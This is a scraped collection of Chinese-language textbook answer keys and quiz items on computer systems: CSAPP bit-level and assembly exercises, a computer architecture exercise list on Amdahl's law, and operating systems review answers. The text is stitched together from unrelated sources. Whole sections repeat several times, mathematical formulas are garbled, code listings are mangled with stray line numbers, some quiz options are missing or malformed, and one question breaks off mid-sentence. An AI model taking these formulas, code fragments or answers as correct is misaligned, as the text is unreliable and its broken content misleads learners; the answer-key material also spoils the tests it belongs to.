深入理解计算机系统(第二版) 家庭作业答案
深入理解计算机系统习题答案
1
2
10 11 12 13 14
CHAPTER 1. SOLUTIONS TO HOMEWORK PROBLEMS
void show_double(double x) { show_bytes((byte_pointer) &x, sizeof(double)); } code/data/show-ans.c
Homework Problems. These are found at the end of each chapter. They vary in complexity from simple drills to multi-week labs and are designed for instructors to give as assignments or to use as recitation examples.
Problem 2.40 Solution: This exercise should be a straightforward variation on the existing code.
code/data/show-ans.c
1 2 3 4 5 6 7 8 9
void show_short(short int x) { show_bytes((byte_pointer) &x, sizeof(short int)); } void show_long(long int x) { show_bytes((byte_pointer) &x, sizeof(long)); }
code/data/show-ans.c
1 2 3 4 5 6 7 8
int is_little_endian(void) { /* MSB = 0, LSB = 1 */ int x = 1; /* Return MSB when big-endian, LSB when little-endian */ return (int) (* (char *) &x); } code/data/show-ans.c
深入理解计算机系统配套练习卷终审稿)
深入理解计算机系统配套练习卷文稿归稿存档编号:[KKUY-KKIO69-OTM243-OLUI129-G00I-FDQS58-《深入》题目李永伟第一章题目我们通常所说的“字节”由_____个二进制位构成。
A 2B 4C 6D 8微型计算机硬件系统中最核心的部位是__。
A 主板B. CPUC 内存处理器D I/O设备CPU中有一个程序计数器(又称指令计数器)。
它用于存储__。
A.保存将要提取的下一条指令的地址B.保存当前CPU所要访问的内存单元地址C.暂时存放ALU运算结果的信息D.保存当前正在执行的一条指令下列叙述中,正确的是A.CPU能直接读取硬盘上的数据B.CPU能直接存取内存储器C.CPU由存储器、运算器和控制器组成D.CPU主要用来存储程序和数据“32位微型计算机”中的32指的是()。
A.微机型号B.内存容量C.运算速度D.机器字长第二章题目求下列算是得值,结果用十六进制表示:0x503c + 64 =______A. 0x507cB.0x507bC. 0x506cD.0x506b将十进制数167用十六进制表示的结果是______A.0XB7B.0XA7C.0XB6D.0XA6位级运算:0x69 & 0x55 的结果是_______A.0X40B.0X41C.0X42D.0X43逻辑运算!!0x41的结果用十六进制表示为_____A.0X00B.0X41C.0X14D.0X01位移运算:对参数则x>>4(算术右移)的结果是______A.[01010000]B.[00001001]C.D.截断:假设一个4位数值(用十六进制数字0~F表示)截断到一个3位数值(用十六进制0~7表示),[1011]截断后的补码值是___A.-3B.3C.5D.-5浮点表示:数字5用浮点表示时的小数字段frac的解释为描述小数值f,则f=______A.1/2B.1/4C.1/8D.1/162.4.2 _25-8数字5用浮点表示,则指数部分E=_____A.1B.2C.3D.4数字5用浮点表示,则指数部分位表示为___A .2^ (K-1)+1B. 2^K+1C. 2^ (K-1)D. 2^K浮点运算:(3.14+1e10)-1e10 在计算机中的运算结果为A .3.14B .0C .1e10D .0.0第三章题目计算Imm(E b ,E i ,s)这种寻址模式所表示的有效地址:A .Imm + R[E b ]+R[E s ] *sB. Imm + R[E b ]+R[Es]C. Imm + R[E b ]D. Imm +R[E s ]下面这种寻址方式属于_____M[R[E b ]]A. 立即数寻址B. 寄存器寻址C. 绝对寻址D. 间接寻址假设初始值:%dh=CD,则执行下面一条指令后,%eax的值为多少?MOVB %DH ,%ALA. %eax= 987654CDB. %eax= CD765432C %eax= FFFFFFCDD. %eax= 000000CD假设初始值:%dh=CD,则执行下面一条指令后,%eax的值为多少?MOVSBL %DH ,%ALA. %eax= 987654CDB. %eax= CD765432C %eax= FFFFFFCDD. %eax= 000000CD假设初始值:%dh=CD,则执行下面一条指令后,%eax的值为多少?MOVZBL %DH ,%ALA. %eax= 987654CDB. %eax= CD765432C %eax= FFFFFFCDD. %eax= 000000CD假设寄存器%eax的值为x,%ecx的值为y,则指明下面汇编指令存储在寄存器%edx中的值Leal (%eax ,%ecx),%edxA. xB yC x + yD x –y假设寄存器%eax的值为x,%ecx的值为y,则指明下面汇编指令存储在寄存器%edx中的值Leal 9(%eax ,%ecx , 2),%edxA. x +y +2B 9*(x + y + 2)C 9 + x + y +2D 9 + x + 2y条件码CF表示______A 零标志B 符号标志C 溢出标志D进位标志条件码OF表示______A 零标志B 符号标志C 溢出标志D进位标志在奔腾4上运行,当分支行为模式非常容易预测时,我们的代码需要大约16个时钟周期,而当模式是随机时,大约需要31个时钟周期,则预测错误处罚大约是多少?A. 25B. 30C. 35D. 40第五章题目指针xp指向x,指针yp指向y,下面是一个交换两个值得过程:Viod swap (int *xp ,int *yp){*xp = *xp + *yp //x+y*yp = *xp - *yp //x+y-y=x*xp = *xp - *yp //x+y-x=y}考虑,当xp=yp时,xp处的值是多少A . xB. yC . 0D.不确定考虑下面函数:int min( int x , int y ) { return x < y x : y;}int max( int x , int y ){ return x < y y : x; }viod incr (int *xp ,int v) { *xp += v;}int square( int x ) { return x *x; }下面一个片段调用这些函数:for( i = min(x,y) ;i< max(x,y); incr(&i,1))t +=square(i) ;假设x等于10,y等于100.指出该片段中4个函数 min (),max(),incr(),square()每个被调用的次数一次为A.91 1 90 90B.1 91 90 90C.1 1 90 90D.90 1 90 90考虑下面函数:int min( int x , int y ) { return x < y x : y;}int max( int x , int y ){ return x < y y : x; }viod incr (int *xp ,int v) { *xp += v;}int square( int x ) { return x *x; }下面一个片段调用这些函数:for( i = max(x,y) -1;i >= min(x,y); incr(&i,-1))t +=square(i) ;假设x等于10,y等于100.指出该片段中4个函数 min (),max(),incr(),square()每个被调用的次数一次为A.91 1 90 90B.1 91 90 90C.1 1 90 90D.90 1 90 90考虑下面函数:int min( int x , int y ) { return x < y x : y;}int max( int x , int y ){ return x < y y : x; }viod incr (int *xp ,int v) { *xp += v;}int square( int x ) { return x *x; }下面一个片段调用这些函数:Int low = min(x,y);Int high = max(x,y);For(i= low;i<high;incr(&i,1)t +=square(i);假设x等于10,y等于100.指出该片段中4个函数 min (),max(),incr(),square()每个被调用的次数依次为A.91 1 90 90B.1 91 90 90C.1 1 90 90D.90 1 90 90假设某个函数有多个变种,这些变种保持函数的行为,又具有不同的性能特性,对于其中的三个变种,我们发现运行时间(以时钟周期为单位)可以用下面的函数近似的估计版本1:60+35n版本2:136+4n版本3:157+1.25n问题是当n=2时,哪个版本最快?A.1B.2C.3D.无法比较假设某个函数有多个变种,这些变种保持函数的行为,又具有不同的性能特性,对于其中的三个变种,我们发现运行时间(以时钟周期为单位)可以用下面的函数近似的估计版本1:60+35n版本2:136+4n版本3:157+1.25n问题是当n=5时,哪个版本最快?A.1B.2C.3D.无法比较假设某个函数有多个变种,这些变种保持函数的行为,又具有不同的性能特性,对于其中的三个变种,我们发现运行时间(以时钟周期为单位)可以用下面的函数近似的估计版本1:60+35n版本2:136+4n版本3:157+1.25n问题是当n=10时,哪个版本最快?A.1B.2C.3D.无法比较下面有一个函数:double poly( double a[] ,double x, int degree){long int i;double result = a[0];double xpwr =x;for(i=1 ; i<=degree; i++){result += a[i] *xpwr;xpwr =x *xpwr;}return result;}当degree=n,这段代码共执行多少次加法和多少次乘法?A.n nB.2n nC.n 2nD.2n 2n一名司机运送一车货物从A地到B地,总距离为2500公里。
计算机系统结构(第2版(课后习题答案
word 文档下载后可自由复制编辑你计算机系统结构清华第 2 版习题解答word 文档下载后可自由复制编辑1 目录1.1 第一章(P33)1.7-1.9 (透明性概念),1.12-1.18 (Amdahl定律),1.19、1.21 、1.24 (CPI/MIPS)1.2 第二章(P124)2.3 、2.5 、2.6 (浮点数性能),2.13 、2.15 (指令编码)1.3 第三章(P202)3.3 (存储层次性能), 3.5 (并行主存系统),3.15-3.15 加 1 题(堆栈模拟),3.19 中(3)(4)(6)(8)问(地址映象/ 替换算法-- 实存状况图)word 文档下载后可自由复制编辑1.4 第四章(P250)4.5 (中断屏蔽字表/中断过程示意图),4.8 (通道流量计算/通道时间图)1.5 第五章(P343)5.9 (流水线性能/ 时空图),5.15 (2种调度算法)1.6 第六章(P391)6.6 (向量流水时间计算),6.10 (Amdahl定律/MFLOPS)1.7 第七章(P446)7.3 、7.29(互连函数计算),7.6-7.14 (互连网性质),7.4 、7.5 、7.26(多级网寻径算法),word 文档下载后可自由复制编辑7.27 (寻径/ 选播算法)1.8 第八章(P498)8.12 ( SISD/SIMD 算法)1.9 第九章(P562)9.18 ( SISD/多功能部件/SIMD/MIMD 算法)(注:每章可选1-2 个主要知识点,每个知识点可只选 1 题。
有下划线者为推荐的主要知识点。
)word 文档 下载后可自由复制编辑2 例 , 习题2.1 第一章 (P33)例 1.1,p10假设将某系统的某一部件的处理速度加快到 10倍 ,但该部件的原处理时间仅为整个运行时间的40%,则采用加快措施后能使整个系统的性能提高多少?解:由题意可知: Fe=0.4, Se=10,根据 Amdahl 定律S n To T n1 (1Fe )S n 1 10.6 0.4100.64 Fe Se 1.56word 文档 下载后可自由复制编辑例 1.2,p10采用哪种实现技术来求浮点数平方根 FPSQR 的操作对系统的性能影响较大。
计算机操作系统第二版答案
习题一1.什么是操作系统?它的主要功能是什么?答:操作系统是用来管理计算机系统的软、硬件资源,合理地组织计算机的工作流程,以方便用户使用的程序集合;其主要功能有进程管理、存储器管理、设备管理和文件管理功能。
2.什么是多道程序设计技术?多道程序设计技术的主要特点是什么?答:多道程序设计技术是把多个程序同时放入内存,使它们共享系统中的资源;特点:(1)多道,即计算机内存中同时存放多道相互独立的程序;(2)宏观上并行,是指同时进入系统的多道程序都处于运行过程中;(3)微观上串行,是指在单处理机环境下,内存中的多道程序轮流占有CPU,交替执行。
3.批处理系统是怎样的一种操作系统?它的特点是什么?答:批处理操作系统是一种基本的操作系统类型。
在该系统中,用户的作业(包括程序、数据及程序的处理步骤)被成批的输入到计算机中,然后在操作系统的控制下,用户的作业自动地执行;特点是:资源利用率高、系统吞吐量大、平均周转时间长、无交互能力。
4.什么是分时系统?什么是实时系统?试从交互性、及时性、独立性、多路性和可靠性几个方面比较分时系统和实时系统。
答:分时系统:一个计算机和许多终端设备连接,每个用户可以通过终端向计算机发出指令,请求完成某项工作,在这样的系统中,用户感觉不到其他用户的存在,好像独占计算机一样。
实时系统:对外部输入的信息,实时系统能够在规定的时间内处理完毕并作出反应。
比较:(1)交互性:实时系统具有交互性,但人与系统的交互,仅限于访问系统中某些特定的专用服务程序。
它不像分时系统那样向终端用户提供数据处理、资源共享等服务。
实时系统的交互性要求系统具有连续人机对话的能力,也就是说,在交互的过程中要对用户得输入有一定的记忆和进一步的推断的能力。
(2)及时性:实时系统对及时性的要求与分时系统类似,都以人们能够接受的等待时间来确定。
而及时系统则对及时性要求更高。
(3)独立性:实时系统与分时系统一样具有独立性。
每个终端用户提出请求时,是彼此独立的工作、互不干扰。
深入理解计算机系统(第二版)家庭作业问题详解
int saturating_add(int x, int y){int w = sizeof(int)<<3;int t = x + y;int ans = x + y;x>>=(w-1);y>>=(w-1);t>>=(w-1);int pos_ovf = ~x&~y&t;int neg_ovf = x&y&~t;int novf = ~(pos_ovf|neg_ovf);return(pos_ovf & INT_MAX) | (novf & ans) | (neg_ovf & INT_MIN); }2.74对于有符号整数相减,溢出的规则可以总结为:t = a-b;如果a, b 同号,则肯定不会溢出。
如果a>=0 && b<0,则只有当t<=0时才算溢出。
如果a<0 && b>=0,则只有当t>=0时才算溢出。
不过,上述t肯定不会等于0,因为当a,b不同号时:1) a!=b,因此a-b不会等于0。
2) a-b <= abs(a) + abs(b) <= abs(TMax) + abs(TMin)=(2^w - 1)所以,a,b异号,t,b同号即可判定为溢出。
int tsub_ovf(int x, int y){int w = sizeof(int)<<3;int t = x - y;x>>=(w-1);y>>=(w-1);t>>=(w-1);return(x != y) && (y == t);}顺便整理一下汇编中CF,OF的设定规则(个人总结,如有不对之处,欢迎指正)。
t = a + b;CF: (unsigned t) < (unsigned a) 进位标志OF: (a<0 == b<0) && (t<0 != a<0)t = a - b;CF: (a<0 && b>=0) || ((a<0 == b<0) && t<0) 退位标志OF: (a<0 != b<0) && (b<0 == t<0)汇编中,无符号和有符号运算对条件码(标志位)的设定应该是相同的,但是对于无符号比较和有符号比较,其返回值是根据不同的标志位进行的。
计算机系统结构(第2版(课后习题答案
word 文档下载后可自由复制编辑你计算机系统结构清华第 2 版习题解答word 文档下载后可自由复制编辑1 目录1.1 第一章(P33)1.7-1.9 (透明性概念),1.12-1.18 (Amdahl定律),1.19、1.21 、1.24 (CPI/MIPS)1.2 第二章(P124)2.3 、2.5 、2.6 (浮点数性能),2.13 、2.15 (指令编码)1.3 第三章(P202)3.3 (存储层次性能), 3.5 (并行主存系统),3.15-3.15 加 1 题(堆栈模拟),3.19 中(3)(4)(6)(8)问(地址映象/ 替换算法-- 实存状况图)word 文档下载后可自由复制编辑1.4 第四章(P250)4.5 (中断屏蔽字表/中断过程示意图),4.8 (通道流量计算/通道时间图)1.5 第五章(P343)5.9 (流水线性能/ 时空图),5.15 (2种调度算法)1.6 第六章(P391)6.6 (向量流水时间计算),6.10 (Amdahl定律/MFLOPS)1.7 第七章(P446)7.3 、7.29(互连函数计算),7.6-7.14 (互连网性质),7.4 、7.5 、7.26(多级网寻径算法),word 文档下载后可自由复制编辑7.27 (寻径/ 选播算法)1.8 第八章(P498)8.12 ( SISD/SIMD 算法)1.9 第九章(P562)9.18 ( SISD/多功能部件/SIMD/MIMD 算法)(注:每章可选1-2 个主要知识点,每个知识点可只选 1 题。
有下划线者为推荐的主要知识点。
)word 文档 下载后可自由复制编辑2 例 , 习题2.1 第一章 (P33)例 1.1,p10假设将某系统的某一部件的处理速度加快到 10倍 ,但该部件的原处理时间仅为整个运行时间的40%,则采用加快措施后能使整个系统的性能提高多少?解:由题意可知: Fe=0.4, Se=10,根据 Amdahl 定律S n To T n1 (1Fe )S n 1 10.6 0.4100.64 Fe Se 1.56word 文档 下载后可自由复制编辑例 1.2,p10采用哪种实现技术来求浮点数平方根 FPSQR 的操作对系统的性能影响较大。
计算机操作系统第二版答案
计算机操作系统第二版答案习题一1. 1. 什么是操作系统?它的主要功能是什么?什么是操作系统?它的主要功能是什么?答:操作系统是用来管理计算机系统的软、硬件资源,合理地组织计算机的工作流程,以方便用户使用的程序集合;其主要功能有进程管理、存储器管理、设备管理和文件管理功能。
管理功能。
2. 2. 2. 什么是多道程序设计技术?多道程序设计技什么是多道程序设计技术?多道程序设计技术的主要特点是什么?答:多道程序设计技术是把多个程序同时放入内存,使它们共享系统中的资源;特点:多道,即计算机内存中同时存放多道相互独立的程序;宏观上并行,是指同时进入系统的多道程序都处于运行过程中;微观上串行,是指在单处理机环境下,内存中的多道程序轮流占有CPU CPU,交替执行。
,交替执行。
3. 3. 批处理系统是怎样的一种操作系统?它的特点是什批处理系统是怎样的一种操作系统?它的特点是什么?答:批处理操作系统是一种基本的操作系统类型。
在该系统中,用户的作业被成批的输入到计算机中,然后在操作系统的控制下,用户的作业自动地执行;特点是:资源利用率高、系统吞吐量大、平均周转时间长、无交互能力。
长、无交互能力。
4. 4. 4. 什么是分时系统?什么是实时系统?什么是分时系统?什么是实时系统?试从交互性、及时性、独立性、多路性和可靠性几个方面比较分时系统和实时系统。
较分时系统和实时系统。
答:分时系统:一个计算机和许多终端设备连接,每个 答:分时系统:一个计算机和许多终端设备连接,每个用户可以通过终端向计算机发出指令,请求完成某项工作,在这样的系统中,用户感觉不到其他用户的存在,好像独占计算机一样。
计算机一样。
实时系统:对外部输入的信息,实时系统能够在规定的 实时系统:对外部输入的信息,实时系统能够在规定的时间内处理完毕并作出反应。
比较:交互性:实时系统具时间内处理完毕并作出反应。
有交互性,但人与系统的交互,仅限于访问系统中某些特定的专用服务程序。
深入理解计算机系统(第二版)家庭作业答案
深⼊理解计算机系统(第⼆版)家庭作业答案2.74对于有符号整数相减,溢出的规则可以总结为:t = a-b;如果a, b 同号,则肯定不会溢出。
如果a>=0 && b<0,则只有当t<=0时才算溢出。
如果a<0 && b>=0,则只有当t>=0时才算溢出。
不过,上述t肯定不会等于0,因为当a,b不同号时:1) a!=b,因此a-b不会等于0。
2) a-b <= abs(a) + abs(b) <= abs(TMax) + abs(TMin)=(2^w - 1)所以,a,b异号,t,b同号即可判定为溢出。
int tsub_ovf(int x, int y){int w = sizeof(int)<<3;int t = x - y;x>>=(w-1);y>>=(w-1);t>>=(w-1);return (x != y) && (y == t);}顺便整理⼀下汇编中CF,OF的设定规则(个⼈总结,如有不对之处,欢迎指正)。
t = a + b;CF: (unsigned t) < (unsigned a) 进位标志OF: (a<0 == b<0) && (t<0 != a<0)t = a - b;CF: (a<0 && b>=0) || ((a<0 == b<0) && t<0) 退位标志OF: (a<0 != b<0) && (b<0 == t<0)汇编中,⽆符号和有符号运算对条件码(标志位)的设定应该是相同的,但是对于⽆符号⽐较和有符号⽐较,其返回值是根据不同的标志位进⾏的。
详情可以参考第三章3.6.2节。
2.75根据2-18,不难推导, (x'*y')_h = (x*y)_h + x(w-1)*y + y(w-1)*x。
第1章 计算机系统概论第二版课后习题详细讲解
第1章计算机系统概论1. 什么是计算机系统、计算机硬件和计算机软件?硬件和软件哪个更重要?解:P3计算机系统:由计算机硬件系统和软件系统组成的综合体。
计算机硬件:指计算机中的电子线路和物理装置。
计算机软件:计算机运行所需的程序及相关资料。
硬件和软件在计算机系统中相互依存,缺一不可,因此同样重要。
2. 如何理解计算机的层次结构?答:计算机硬件、系统软件和应用软件构成了计算机系统的三个层次结构。
(1)硬件系统是最内层的,它是整个计算机系统的基础和核心。
(2)系统软件在硬件之外,为用户提供一个基本操作界面。
(3)应用软件在最外层,为用户提供解决具体问题的应用系统界面。
通常将硬件系统之外的其余层称为虚拟机。
各层次之间关系密切,上层是下层的扩展,下层是上层的基础,各层次的划分不是绝对的。
3. 说明高级语言、汇编语言和机器语言的差别及其联系。
答:机器语言是计算机硬件能够直接识别的语言,汇编语言是机器语言的符号表示,高级语言是面向算法的语言。
高级语言编写的程序(源程序)处于最高层,必须翻译成汇编语言,再由汇编程序汇编成机器语言(目标程序)之后才能被执行。
4. 如何理解计算机组成和计算机体系结构?答:计算机体系结构是指那些能够被程序员所见到的计算机系统的属性,如指令系统、数据类型、寻址技术组成及I/O 机理等。
计算机组成是指如何实现计算机体系结构所体现的属性,包含对程序员透明的硬件细节,如组成计算机系统的各个功能部件的结构和功能,及相互连接方法等。
5. 冯•诺依曼计算机的特点是什么?解:冯•诺依曼计算机的特点是:P8●计算机由运算器、控制器、存储器、输入设备、输出设备五大部件组成;●指令和数据以同同等地位存放于存储器内,并可以按地址访问;●指令和数据均用二进制表示;●指令由操作码、地址码两大部分组成,操作码用来表示操作的性质,地址码用来表示操作数在存储器中的位置;●指令在存储器中顺序存放,通常自动顺序取出执行;●机器以运算器为中心(原始冯•诺依曼机)。
计算机操作系统第二版答案
计算机操作系统第二版答案习题一1. 什么是操作系统?它的主要功能是什么?答:操作系统是用来管理计算机系统的软、硬件资源,合理地组织计算机的工作流程,以方便用户使用的程序集合;其主要功能有进程管理、存储器管理、设备管理和文件管理功能。
2. 什么是多道程序设计技术?多道程序设计技术的主要特点是什么?答:多道程序设计技术是把多个程序同时放入内存,使它们共享系统中的资源;特点:多道,即计算机内存中同时存放多道相互独立的程序;宏观上并行,是指同时进入系统的多道程序都处于运行过程中;微观上串行,是指在单处理机环境下,内存中的多道程序轮流占有CPU,交替执行。
3. 批处理系统是怎样的一种操作系统?它的特点是什么?答:批处理操作系统是一种基本的操作系统类型。
在该系统中,用户的作业被成批的输入到计算机中,然后在操作系统的控制下,用户的作业自动地执行;特点是:资源利用率高、系统吞吐量大、平均周转时间长、无交互能力。
4. 什么是分时系统?什么是实时系统?试从交互性、及时性、独立性、多路性和可靠性几个方面比较分时系统和实时系统。
答:分时系统:一个计算机和许多终端设备连接,每个用户可以通过终端向计算机发出指令,请求完成某项工作,在这样的系统中,用户感觉不到其他用户的存在,好像独占计算机一样。
实时系统:对外部输入的信息,实时系统能够在规定的时间内处理完毕并作出反应。
比较:交互性:实时系统具有交互性,但人与系统的交互,仅限于访问系统中某些特定的专用服务程序。
它不像分时系统那样向终端用户提供数据处理、资源共享等服务。
实时系统的交互性要求系统具有连续人机对话的能力,也就是说,在交互的过程中要对用户得输入有一定的记忆和进一步的推断的能力。
及时性:实时系统对及时性的要求与分时系统类似,都以人们能够接受的等待时间来确定。
而及时系统则对及时性要求更高。
独立性:实时系统与分时系统一样具有独立性。
每个终端用户提出请求时,是彼此独立的工作、互不干扰。
深入理解计算机系统 家庭作业答案
2) a-b <= abs(a) + abs(b) <= abs(TMax) + abs(TMin)=(2^w - 1)所以,a,b异号,t,b同号即可判定为溢出。
int tsub_ovf(int x, int y){int w = sizeof(int)<<3;int t = x - y;x>>=(w-1);y>>=(w-1);t>>=(w-1);return(x != y) && (y == t);}顺便整理一下汇编中CF,OF的设定规则(个人总结,如有不对之处,欢迎指正)。
t = a + b;CF: (unsigned t) < (unsigned a) 进位标志OF: (a<0 == b<0) && (t<0 != a<0)t = a - b;CF: (a<0 && b>=0) || ((a<0 == b<0) && t<0) 退位标志OF: (a<0 != b<0) && (b<0 == t<0)汇编中,无符号和有符号运算对条件码(标志位)的设定应该是相同的,但是对于无符号比较和有符号比较,其返回值是根据不同的标志位进行的。
详情可以参考第三章节。
根据2-18,不难推导, (x'*y')_h = (x*y)_h + x(w-1)*y + y(w-1)*x。
unsigned unsigned_high_prod(unsigned x, unsigned y){int w = sizeof(int)<<3;A. false,float只能精确表示最高位1和最低位的1的位数之差小于24的整数。
所以当x==TMAX时,用float就无法精确表示,但double是可以精确表示所有32位整数的。
计算机系统结构(第2版(课后习题答案.
浮点数据表示;不透明(系统结构)
I/O 系统是采用通道方式还是 I/O 处理机方式;不透明
数据总线宽度;透明(组成)
阵列运算部件;透明(组成)
通道是采用结合型的还是独立型的;透明(组成)
PDP-11 系列中的单总线结构;不透明(系统结构)
果 FPSQR 操作的 CPI 也为 4.0,重新计算等效 CPI。
解:
n
CPI (CPI i
i 1
Ii
)
IC
等效 CPI=100´2%+4´23%+1.33´75%
=3.92
等效 CPI2=4´25%+1.33´75%
=2.00
1.1
解释下列术语
层次结构,计算机系统结构,计算机组成,计算机实现,透明性,由上而下设计,由下而
钟周期。
CPUA:采用一条比较指令来设置相应的条件码,由紧随其后的一条转移指令对此条件码进行
9
测试,以确定是否进行转移。显然实现一次条件转移要执行比较和测试两条指令。条件转
移指令占总执行指令条数的 20%。由于每条转移指令都需要一条比较指令,所以比较指令也
将占 20%。
CPUB 采用比较功能和判别是否实现转移功能合在一条指令的方法,这样实现一条件转移就只
浮点数据,×,P4
通道与 I/O 处理机,×,P4
总线宽度,√,
阵列运算部件,×,
结合型与独立型通道,√,
单总线,√,
访问保护,×,
中断,×,
指令控制方式,√,
堆栈指令,×,
最小编址单位,×,
Cache 存储器,√,
1.8
从机器(汇编)语言程序员看,以下哪些是透明的?
深入理解计算机系统答案(超高清电子版)
Computer Systems:A Programmer’s PerspectiveInstructor’s Solution Manual1Randal E.BryantDavid R.O’HallaronDecember4,20031Copyright c2003,R.E.Bryant,D.R.O’Hallaron.All rights reserved.2Chapter1Solutions to Homework ProblemsThe text uses two different kinds of exercises:Practice Problems.These are problems that are incorporated directly into the text,with explanatory solutions at the end of each chapter.Our intention is that students will work on these problems as they read the book.Each one highlights some particular concept.Homework Problems.These are found at the end of each chapter.They vary in complexity from simple drills to multi-week labs and are designed for instructors to give as assignments or to use as recitation examples.This document gives the solutions to the homework problems.1.1Chapter1:A Tour of Computer Systems1.2Chapter2:Representing and Manipulating InformationProblem2.40Solution:This exercise should be a straightforward variation on the existing code.2CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS1011void show_double(double x)12{13show_bytes((byte_pointer)&x,sizeof(double));14}code/data/show-ans.c 1int is_little_endian(void)2{3/*MSB=0,LSB=1*/4int x=1;56/*Return MSB when big-endian,LSB when little-endian*/7return(int)(*(char*)&x);8}1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION3 There are many solutions to this problem,but it is a little bit tricky to write one that works for any word size.Here is our solution:code/data/shift-ans.c The above code peforms a right shift of a word in which all bits are set to1.If the shift is arithmetic,the resulting word will still have all bits set to1.Problem2.45Solution:This problem illustrates some of the challenges of writing portable code.The fact that1<<32yields0on some32-bit machines and1on others is common source of bugs.A.The C standard does not define the effect of a shift by32of a32-bit datum.On the SPARC(andmany other machines),the expression x<<k shifts by,i.e.,it ignores all but the least significant5bits of the shift amount.Thus,the expression1<<32yields1.pute beyond_msb as2<<31.C.We cannot shift by more than15bits at a time,but we can compose multiple shifts to get thedesired effect.Thus,we can compute set_msb as2<<15<<15,and beyond_msb as set_msb<<1.Problem2.46Solution:This problem highlights the difference between zero extension and sign extension.It also provides an excuse to show an interesting trick that compilers often use to use shifting to perform masking and sign extension.A.The function does not perform any sign extension.For example,if we attempt to extract byte0fromword0xFF,we will get255,rather than.B.The following code uses a well-known trick for using shifts to isolate a particular range of bits and toperform sign extension at the same time.First,we perform a left shift so that the most significant bit of the desired byte is at bit position31.Then we right shift by24,moving the byte into the proper position and peforming sign extension at the same time.4CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 3int left=word<<((3-bytenum)<<3);4return left>>24;5}Problem2.48Solution:This problem lets students rework the proof that complement plus increment performs negation.We make use of the property that two’s complement addition is associative,commutative,and has additive ing C notation,if we define y to be x-1,then we have˜y+1equal to-y,and hence˜y equals -y+1.Substituting gives the expression-(x-1)+1,which equals-x.Problem2.49Solution:This problem requires a fairly deep understanding of two’s complement arithmetic.Some machines only provide one form of multiplication,and hence the trick shown in the code here is actually required to perform that actual form.As seen in Equation2.16we have.Thefinal term has no effect on the-bit representation of,but the middle term represents a correction factor that must be added to the high order bits.This is implemented as follows:code/data/uhp-ans.c Problem2.50Solution:Patterns of the kind shown here frequently appear in compiled code.1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION5A.:x+(x<<2)B.:x+(x<<3)C.:(x<<4)-(x<<1)D.:(x<<3)-(x<<6)Problem2.51Solution:Bit patterns similar to these arise in many applications.Many programmers provide them directly in hex-adecimal,but it would be better if they could express them in more abstract ways.A..˜((1<<k)-1)B..((1<<k)-1)<<jProblem2.52Solution:Byte extraction and insertion code is useful in many contexts.Being able to write this sort of code is an important skill to foster.code/data/rbyte-ans.c Problem2.53Solution:These problems are fairly tricky.They require generating masks based on the shift amounts.Shift value k equal to0must be handled as a special case,since otherwise we would be generating the mask by performing a left shift by32.6CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1unsigned srl(unsigned x,int k)2{3/*Perform shift arithmetically*/4unsigned xsra=(int)x>>k;5/*Make mask of low order32-k bits*/6unsigned mask=k?((1<<(32-k))-1):˜0;78return xsra&mask;9}code/data/rshift-ans.c 1int sra(int x,int k)2{3/*Perform shift logically*/4int xsrl=(unsigned)x>>k;5/*Make mask of high order k bits*/6unsigned mask=k?˜((1<<(32-k))-1):0;78return(x<0)?mask|xsrl:xsrl;9}.1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION7B.(a)For,we have,,code/data/floatge-ans.c 1int float_ge(float x,float y)2{3unsigned ux=f2u(x);4unsigned uy=f2u(y);5unsigned sx=ux>>31;6unsigned sy=uy>>31;78return9(ux<<1==0&&uy<<1==0)||/*Both are zero*/10(!sx&&sy)||/*x>=0,y<0*/11(!sx&&!sy&&ux>=uy)||/*x>=0,y>=0*/12(sx&&sy&&ux<=uy);/*x<0,y<0*/13},8CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS This exercise is of practical value,since Intel-compatible processors perform all of their arithmetic in ex-tended precision.It is interesting to see how adding a few more bits to the exponent greatly increases the range of values that can be represented.Description Extended precisionValueSmallest denorm.Largest norm.Problem2.59Solution:We have found that working throughfloating point representations for small word sizes is very instructive. Problems such as this one help make the description of IEEEfloating point more concrete.Description8000Smallest value4700Largest denormalized———code/data/fpwr2-ans.c1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS91/*Compute2**x*/2float fpwr2(int x){34unsigned exp,sig;5unsigned u;67if(x<-149){8/*Too small.Return0.0*/9exp=0;10sig=0;11}else if(x<-126){12/*Denormalized result*/13exp=0;14sig=1<<(x+149);15}else if(x<128){16/*Normalized result.*/17exp=x+127;18sig=0;19}else{20/*Too big.Return+oo*/21exp=255;22sig=0;23}24u=exp<<23|sig;25return u2f(u);26}10CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS int decode2(int x,int y,int z){int t1=y-z;int t2=x*t1;int t3=(t1<<31)>>31;int t4=t3ˆt2;return t4;}Problem3.32Solution:This code example demonstrates one of the pedagogical challenges of using a compiler to generate assembly code examples.Seemingly insignificant changes in the C code can yield very different results.Of course, students will have to contend with this property as work with machine-generated assembly code anyhow. They will need to be able to decipher many different code patterns.This problem encourages them to think in abstract terms about one such pattern.The following is an annotated version of the assembly code:1movl8(%ebp),%edx x2movl12(%ebp),%ecx y3movl%edx,%eax4subl%ecx,%eax result=x-y5cmpl%ecx,%edx Compare x:y6jge.L3if>=goto done:7movl%ecx,%eax8subl%edx,%eax result=y-x9.L3:done:A.When,it will computefirst and then.When it just computes.B.The code for then-statement gets executed unconditionally.It then jumps over the code for else-statement if the test is false.C.then-statementt=test-expr;if(t)goto done;else-statementdone:D.The code in then-statement must not have any side effects,other than to set variables that are also setin else-statement.1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS11Problem3.33Solution:This problem requires students to reason about the code fragments that implement the different branches of a switch statement.For this code,it also requires understanding different forms of pointer dereferencing.A.In line29,register%edx is copied to register%eax as the return value.From this,we can infer that%edx holds result.B.The original C code for the function is as follows:1/*Enumerated type creates set of constants numbered0and upward*/2typedef enum{MODE_A,MODE_B,MODE_C,MODE_D,MODE_E}mode_t;34int switch3(int*p1,int*p2,mode_t action)5{6int result=0;7switch(action){8case MODE_A:9result=*p1;10*p1=*p2;11break;12case MODE_B:13*p2+=*p1;14result=*p2;15break;16case MODE_C:17*p2=15;18result=*p1;19break;20case MODE_D:21*p2=*p1;22/*Fall Through*/23case 